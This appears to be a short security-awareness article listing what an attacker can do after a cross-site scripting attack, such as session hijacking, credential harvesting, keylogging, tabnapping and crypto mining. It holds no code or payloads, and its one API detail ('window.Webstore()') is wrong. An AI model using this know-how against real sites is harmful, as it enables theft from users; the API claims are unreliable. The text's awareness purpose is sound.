What can an XSS attacker do?

Generally speaking, if an attacker manages to perform an XSS attack, he could be able to basically do one or more of the following:

• Ad-Jacking — Inject his ads in it to make money
• Click-Jacking — Create a hidden overlay on a page to hijack clicks of the victim to perform malicious actions.
• Session Hijacking — HTTP cookies can be accessed by JavaScript if the HTTP ONLY flag is not present in the cookies.
• Content Spoofing — JavaScript has full access to the client-side code of a web app and hence he could use it to show/modify desired content.
• Credential Harvesting — He could use a fancy popup to harvest credentials: WiFi firmware has been updated, re-enter your credentials to authenticate.
• Forced Downloads — So the victim isn’t downloading his malicious flash player from good-domain.com? No problem: he could just try to force a download from the trusted website the victim is visiting.
• Crypto Mining — He could use the victim’s CPU to mine some bitcoin (or altcoin)
• Bypassing CSRF protection — He could collect and submit CSRF tokens to perform POST operations elsewhere on the site.
• Keylogging — Self-explanatory
• Recording Audio, Taking pictures, Geo-location — It requires authorization from the user but he could access the victim’s camera, microphone, and location. Thanks to HTML5 and JavaScript.
• Stealing HTML5 web storage data — A website can store data in the browser for later use and, of course, JavaScript can access that storage via window.localStorage() and window.Webstore()
• Fingerprinting — Very easy to find your browser name, version, installed plugins, and their versions, your operating system, architecture, system time, language, and screen resolution.
• Network Scanning — Victim’s browser can be abused to scan ports and hosts with Javascript. Crashing Browsers — Why not?! :-)
• Stealing Information — Grab information from the webpage and send it to his malicious server.
• Redirecting — Self-explanatory
• Tabnapping — Fancy version of redirection: when no keyboard or mouse events have been received for more than a minute, it could mean that the user is AFK and he can sneakily replace the current webpage with a fake one.
• Capturing Screenshots — Thanks to HTML5 again, now you can take a screenshot of a webpage. Blind XSS detection tools have been doing this before it was cool.
• Perform Actions — He is controlling the browser

Not all is lost, cross-site scripting can be prevented!